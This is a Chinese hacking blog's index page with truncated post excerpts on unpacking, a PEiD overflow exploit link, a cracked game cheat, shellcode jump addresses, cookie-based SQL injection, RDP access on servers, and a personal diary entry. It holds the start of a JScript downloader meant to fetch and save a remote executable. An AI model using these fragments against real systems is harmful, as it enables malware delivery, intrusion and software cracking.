|
PEiD <= 0.92溢出分析
|
可能是老东西了,不过无聊打发时间玩玩吧。
http://www.milw0rm.com/exploits/7347
这里有生成好的exp。
脱壳
下了一个0.92版的peid,用peid查了下这个peid(有点绕:))发现还加的有壳。是UPXShit 0.06 -> snaker,先脱了壳再说吧。
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 223
|
|
PECompact 2.x -> Jeremy Collake
|
闲着也是闲着,无聊时打发时间吧.
也玩玩壳aspack upx upack0.39final Nspack3.7 Petite 2.2这些都是简单的压缩壳,直接ESP定律到OEP再DUMP就OK了.我就不记录了.
PECompact 2.x -> Jeremy Collake
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 3
|
TrackBack: 0
| Views: 1017
|
|
QQ四国军旗外挂
|
这些日子没事老玩QQ四国军旗.今天找到一个能记牌的外挂,觉得挺好的,因此记录之.
不过他老弹广告.我脱了壳后发现有自校验,,还老升级替换原来程序.我一并都给弄OK了.
发上来吧.
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 167
|
|
(转)shellcode的一些跳转地址
|
中文通用JMP ESP和pop/pop/ret地址
7ffa4512 ffe4 jmp esp
7ffa54cd ffe4 jmp esp
7ffa1571 58 pop eax
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 887
|
|
近段时间
|
到了这么远的地方,总还是有点不习惯,下意识的觉得拉开了与所有人的距离.经过这么几个月我虽然不至于讨厌这里,却没有长期生活在此的打算.
陌生,远,生活成本高. 也许这三点就足够了.
或者说以上所有的原因都是掩盖我想回武汉的挡箭牌. 我不知道为什么总是这么想.也不想再去想,可能想象中的美好总是和现实来做对比来强占上风,但是这个比对却是不公平的.
倒是带我来这里的现实的人,哪怕是和想象中的美好做对比也是胜者.
罢了,这些琐事也无法说的清. 因为连我自己都处在混混沌沌中. 不过前两天通过巧妙构思搞定的一件事至今还令我欣慰,从而特别赞同庞加莱所说的,首先最令人激动的就是出现了顿悟,它是此前进行了长时间不自觉工作的明显的征兆.
|
|
Author: kyo327 | Category: KYO--随笔 |
Comments: 0
|
TrackBack: 0
| Views: 1091
|
|
转 js下载者
|
//use: cscript this.js http://www.xxx.com/xxx.exe c:\xxx.exe
var objArgs = WScript.Arguments;
var sGet=new ActiveXObject("ADODB.Stream");
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 801
|
|
VC对话框程序的皮肤美化
|
还是用SkinMagic.
如何使用:
① 新建工程后,将SkinMagic包中的SkinMagicLib.h、SkinMagicLib.lib、DETOURS.lib拷贝到所在文件夹下,点击Project->Add To Project->Files,包含到工程中。
② 在Resource View中点击Import 菜单引入Skin二进制文件 , 导入后可以取名字为 如:xpblue
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 970
|
|
(转)cookies的注入基本方法和原理介绍
|
现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式都没有防备。
在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲中都提到Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用"request("name")"但它的效率低下,容易出错,当我们省略具体的集合名称时,ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.
我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5.0 "官方下载地址"http://www.cnetking.com/websys2.asp?id=26"发布时间是2007-06-06,打开系统的源代码后,在"user_RxMsg_detail.asp"文件中,有如下代码:
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 1
|
TrackBack: 0
| Views: 431
|
|
递归实现的全排列
|
#include <string>
static char set[27] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //象征性的写一下,其实没被用到
static char choose[27]; //存储选择的元素
static char combination[27]; //用于生成其中一个排列组合结果
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 610
|
|
(转)开了3389无法登录的6种原因
|
1、服务器在内网。
2、做了tcp/ip筛选。
先执行下面cmd命令:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip,导出注册表里关于TCP/IP筛选的第二处
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 0
|
TrackBack: 0
| Views: 917
|
|
OD的万能断点插件原理
|
实际上,是在ECGetText里头工作要完成时,下了个断点。
ECGetText,顾名思义就是edit control get text.
也就是在获取文本框内容时下个断点,
由于这个断点比较底层,所以被称为万能断点,
Read More...
|
|
Author: kyo327 | Category: 黑客技术文章 |
Comments: 4
|
TrackBack: 0
| Views: 3347
|
|
KYO的地盘
